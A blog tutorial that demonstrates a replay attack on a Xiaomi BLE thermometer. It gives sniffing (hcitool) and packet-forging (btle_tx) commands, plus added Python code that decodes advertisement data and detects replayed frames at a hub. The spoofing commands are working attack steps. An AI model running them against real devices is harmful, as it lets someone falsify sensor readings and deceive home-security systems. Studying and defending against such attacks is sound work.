Unveiling IoT Vulnerabilities: Exploring Replay Attacks on BLE Devices

Sadettin Bölük
4 min read · Mar 22, 2024


IoT devices have entered our daily lives, and their influence grows every day. The new generation of IoT devices has started to use the BLE protocol because of its power efficiency, which extends their battery life. As these devices are used by more people in more places, the security of BLE devices has become a main concern. In this write-up we will see what a replay attack is and how it is applied to such devices.

What is a Replay Attack?

Imagine you have a keyless entry system for your car that uses radio waves (RF) to unlock the doors. When you press the button on your key fob, it sends a unique signal to your car, like a secret handshake. The car recognizes the signal and unlocks the doors.

Now, picture someone with a special device that can capture and replay radio signals. They eavesdrop on your key fob’s signal as you unlock your car. They don’t break any codes, they just record the “handshake.” Later, they can replay that same signal to trick your car into thinking it’s you unlocking it, even though you’re nowhere near!

That’s the essence of an RF replay attack. The attacker intercepts a valid radio signal and then rebroadcasts it at a later time, fooling the receiver (like your car) into thinking it’s a new, legitimate transmission.

Replay Attacks: Risks to Your Everyday IoT Experience

Imagine a smart home security system that relies on BLE-enabled sensors to detect and communicate intrusions. These sensors, strategically placed around the home, continuously transmit data about motion detection, door/window status, and environmental conditions to a central hub, which then triggers appropriate responses such as sounding an alarm or notifying the homeowner.

Now, suppose an attacker successfully executes a replay attack by intercepting and replaying the authentication signals from one of these sensors. By impersonating legitimate sensor signals, the attacker can deceive the central hub into believing that no security breach has occurred when, in fact, an intruder has entered the home.

Demonstration:

In our demonstration, we will use a Xiaomi LYWSD03MMC thermometer and try to deceive our receiver. Before we start we need some equipment and software.

This repository does a lot of things for us that we would otherwise have to do manually. Once we have all of these, we can start with sniffing.

BLE devices advertise themselves to other devices through ADV_IND packets. Such a packet contains information about the device, like its MAC address, battery level, etc. In our case, the ADV_IND packets of the Xiaomi LYWSD03MMC thermometer contain its current temperature, humidity and battery level as a percentage. So we can sniff this data and advertise ourselves as the thermometer, and in doing so we can mislead other devices that act on this data.

Firstly, BlueZ must be installed on our PC; if it is not, install it via the link that I provide.

Sniffing Advertisement Data:

  • Open a terminal window and enter the command:
sudo hcitool lescan | grep XX:XX:XX:XX:XX:XX

Replace XX:XX:XX:XX:XX:XX with the MAC address of your BLE device.

  • Wait for the scan to capture the advertisement data, which typically includes device information like MAC address, battery power, and sensor data.

Initiating the Replay Attack:

  • Install the BTLE software from the GitHub repository mentioned in the article.
  • Open a terminal window and navigate to the BTLE directory.
  • Execute the following command:
./btle_tx 37-ADV_IND-TxAdd-0-RxAdd-0-AdvA-a4c130d37e-AdvData-0201050702031802180418-Space-1 r500
  • Replace a4c130d37e with your device’s MAC address.
  • Replace 0201050702031802180418 with the data collected from the hcitool command.
  • The Space-1 parameter specifies the time interval between packet transmissions (in seconds).
  • r500 indicates the number of packets to be sent (in this example, 500).
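The AdvData parameter in the btle_tx command above is not an opaque blob: it is a sequence of AD structures, each laid out as length | type | data, exactly the structures that the ADV_IND packets described earlier carry. As an added example (not code from this article or from the BTLE project), here is a Python decoder for that layout. It decodes the page's own value 0201050702031802180418 and a second, constructed payload carrying a Complete Local Name; the name and the second payload are assumptions made for the example, not bytes captured from a real device.

```python
from dataclasses import dataclass
from typing import List

# AD type codes from the Bluetooth Assigned Numbers (the subset this decoder understands)
AD_TYPES = {
    0x01: "Flags",
    0x02: "Incomplete List of 16-bit Service UUIDs",
    0x03: "Complete List of 16-bit Service UUIDs",
    0x08: "Shortened Local Name",
    0x09: "Complete Local Name",
    0x0A: "Tx Power Level",
    0x16: "Service Data - 16-bit UUID",
    0xFF: "Manufacturer Specific Data",
}

FLAG_BITS = {
    0: "LE Limited Discoverable Mode",
    1: "LE General Discoverable Mode",
    2: "BR/EDR Not Supported",
    3: "Simultaneous LE and BR/EDR (Controller)",
    4: "Simultaneous LE and BR/EDR (Host)",
}

MAX_ADV_DATA_LEN = 31  # legacy advertising PDUs carry at most 31 bytes of AdvData


@dataclass
class AdStructure:
    ad_type: int
    data: bytes

    @property
    def type_name(self) -> str:
        return AD_TYPES.get(self.ad_type, f"Unknown AD type 0x{self.ad_type:02x}")

    def decode(self) -> str:
        """Human-readable rendering of the data field for the types we know."""
        if self.ad_type == 0x01 and self.data:
            flags = self.data[0]
            names = [name for bit, name in FLAG_BITS.items() if flags & (1 << bit)]
            return ", ".join(names) or "none"
        if self.ad_type in (0x02, 0x03):
            return ", ".join(f"0x{u:04x}" for u in decode_uuid16_list(self.data))
        if self.ad_type in (0x08, 0x09):
            return self.data.decode("utf-8", errors="replace")
        if self.ad_type == 0x0A and self.data:
            return f"{int.from_bytes(self.data[:1], 'little', signed=True)} dBm"
        return self.data.hex()


def decode_uuid16_list(data: bytes) -> List[int]:
    """16-bit UUIDs are transmitted little-endian, two bytes each."""
    if len(data) % 2:
        raise ValueError("odd-length 16-bit UUID list")
    return [int.from_bytes(data[i:i + 2], "little") for i in range(0, len(data), 2)]


def parse_adv_data(hex_str: str) -> List[AdStructure]:
    """Split an AdvData hex string into its length/type/data structures.

    Raises ValueError on a structure that claims more bytes than remain, which is
    the kind of malformed input a receiver must reject rather than trust.
    """
    raw = bytes.fromhex(hex_str)
    if len(raw) > MAX_ADV_DATA_LEN:
        raise ValueError(f"AdvData is {len(raw)} bytes, limit is {MAX_ADV_DATA_LEN}")
    structures, pos = [], 0
    while pos < len(raw):
        length = raw[pos]
        if length == 0:          # a zero-length entry is padding; nothing meaningful follows
            break
        end = pos + 1 + length
        if end > len(raw):
            raise ValueError(f"AD structure at offset {pos} runs past the end of AdvData")
        structures.append(AdStructure(raw[pos + 1], raw[pos + 2:end]))
        pos = end
    return structures


if __name__ == "__main__":
    # First sample: the AdvData value from the btle_tx command in this article.
    # Second sample: a constructed payload with a Complete Local Name (not captured from a device).
    for sample in ("0201050702031802180418", "0201060b094c5957534430334d4d43"):
        print(f"AdvData {sample}:")
        for s in parse_adv_data(sample):
            print(f"  {s.type_name}: {s.decode()}")
```

Decoding the page's sample gives a Flags structure (0x05: LE Limited Discoverable Mode, BR/EDR Not Supported) and an Incomplete List of 16-bit Service UUIDs containing 0x1803, 0x1802 and 0x1804 (the Link Loss, Immediate Alert and Tx Power services), which is why the article tells you to substitute the data you actually captured from your own thermometer.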

You can see the device, with the name that you typed in, in other BLE discovery apps such as LightBlue or nRF Connect.

We have now successfully launched a replay attack.

After that, if you replace the ADV data with your own configured ADV data, you can manipulate receivers that use this data as information. In our example, my device sends temperature, humidity and battery information. You can dig deeper into the software and establish a connection with another device using just this information and the correct format (that is the subject of another article).
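Advertisements are unauthenticated broadcasts, so the receiving hub is where replay has to be caught. As an added example (not code from this article or from any Xiaomi firmware), here is a hub-side freshness check in Python. It assumes a payload layout invented for the example, since the page does not describe the thermometer's real format: a one-byte frame counter, a little-endian signed temperature in 0.01 °C, then humidity and battery as percentages. The capture it runs over is constructed, not sniffer output; the MAC address, COUNTER_WINDOW and STALE_AFTER_S values are assumptions.

```python
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Assumptions for this example (not stated on the page):
COUNTER_WINDOW = 32    # largest forward jump of the 8-bit counter we tolerate (missed frames)
STALE_AFTER_S = 30.0   # the sensor is assumed to publish a new reading at least this often


@dataclass
class Reading:
    counter: int
    temperature_c: float
    humidity_pct: int
    battery_pct: int


def decode_payload(payload: bytes) -> Reading:
    """Decode the assumed 5-byte payload: counter, int16 temp*100, humidity %, battery %."""
    if len(payload) != 5:
        raise ValueError(f"unexpected payload length {len(payload)}")
    counter, temp_raw, hum, batt = struct.unpack("<BhBB", payload)
    if not (0 <= hum <= 100 and 0 <= batt <= 100):
        raise ValueError("humidity/battery out of range")
    return Reading(counter, temp_raw / 100.0, hum, batt)


@dataclass
class SensorState:
    last_counter: int
    last_payload: bytes
    first_seen_at: float   # when the currently accepted frame was first received


class ReplayDetector:
    """Per-MAC freshness tracking for advertisement frames received by the hub."""

    def __init__(self) -> None:
        self.sensors: Dict[str, SensorState] = {}

    def check(self, t: float, mac: str, payload: bytes) -> Tuple[str, Optional[Reading]]:
        """Return (verdict, reading); verdict is accept, duplicate, replay or invalid."""
        try:
            reading = decode_payload(payload)
        except (ValueError, struct.error):
            return "invalid", None

        state = self.sensors.get(mac)
        if state is None:
            self.sensors[mac] = SensorState(reading.counter, payload, t)
            return "accept", reading

        if payload == state.last_payload:
            # Advertisers repeat a frame many times per interval, so a byte-identical
            # frame is normal while it is young. Once the sensor should have moved on,
            # the same bytes again can only be a re-send of a captured frame.
            if t - state.first_seen_at > STALE_AFTER_S:
                return "replay", reading
            return "duplicate", reading

        delta = (reading.counter - state.last_counter) % 256   # handles 0xFF -> 0x00 wrap
        if delta == 0 or delta > COUNTER_WINDOW:
            # Counter did not advance (altered contents under an already used counter)
            # or went backwards modulo 256 (an older captured frame being re-sent).
            return "replay", reading

        self.sensors[mac] = SensorState(reading.counter, payload, t)
        return "accept", reading


def run_capture(capture: List[Tuple[float, str, str]]) -> List[str]:
    """Feed (time_s, mac, payload_hex) records through the detector and return verdicts."""
    det = ReplayDetector()
    return [det.check(t, mac, bytes.fromhex(hexdata))[0] for t, mac, hexdata in capture]


# Constructed capture (not real sniffer output). The first four frames are the
# genuine sensor; the rest simulate earlier frames being re-sent or altered.
SAMPLE_CAPTURE = [
    (0.0,  "AA:BB:CC:DD:EE:01", "1066082d57"),  # counter 0x10, 21.50 C, 45 %, 87 %
    (0.5,  "AA:BB:CC:DD:EE:01", "1066082d57"),  # same frame repeated: normal advertising
    (10.0, "AA:BB:CC:DD:EE:01", "1170082d57"),  # counter 0x11, 21.60 C
    (20.0, "AA:BB:CC:DD:EE:01", "127a082d57"),  # counter 0x12, 21.70 C
    (25.0, "AA:BB:CC:DD:EE:01", "1066082d57"),  # old frame 0x10 re-sent: replay
    (60.0, "AA:BB:CC:DD:EE:01", "127a082d57"),  # latest frame re-sent after it went stale: replay
    (61.0, "AA:BB:CC:DD:EE:01", "1200002d57"),  # counter 0x12 reused with altered temperature: replay
    (62.0, "AA:BB:CC:DD:EE:01", "1234"),        # truncated frame: invalid
]

if __name__ == "__main__":
    for rec, verdict in zip(SAMPLE_CAPTURE, run_capture(SAMPLE_CAPTURE)):
        print(f"t={rec[0]:5.1f}s {rec[1]} {rec[2]:<12} -> {verdict}")
```

Two caveats worth noticing in the verdicts: a re-sent copy of the sensor's most recent frame is indistinguishable from the sensor's own repetitions until that frame is older than the sensor's refresh interval, so the time check is what closes that window; and a counter only defeats verbatim replay. An attacker who rewrites the payload and picks a fresh counter, as the paragraph above describes, is only stopped by a keyed integrity check on the payload, which is a property the thermometer's plain advertisements do not provide.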

Through this demonstration of a replay attack on BLE devices, we’ve highlighted the vulnerabilities that exist in IoT security. It’s important to be aware of these risks and to take steps to protect against them. Always remember that the information presented here is for educational purposes only, and using it for any illegal or harmful activities is strongly discouraged. Stay informed, stay vigilant, and prioritize the security of your IoT devices.
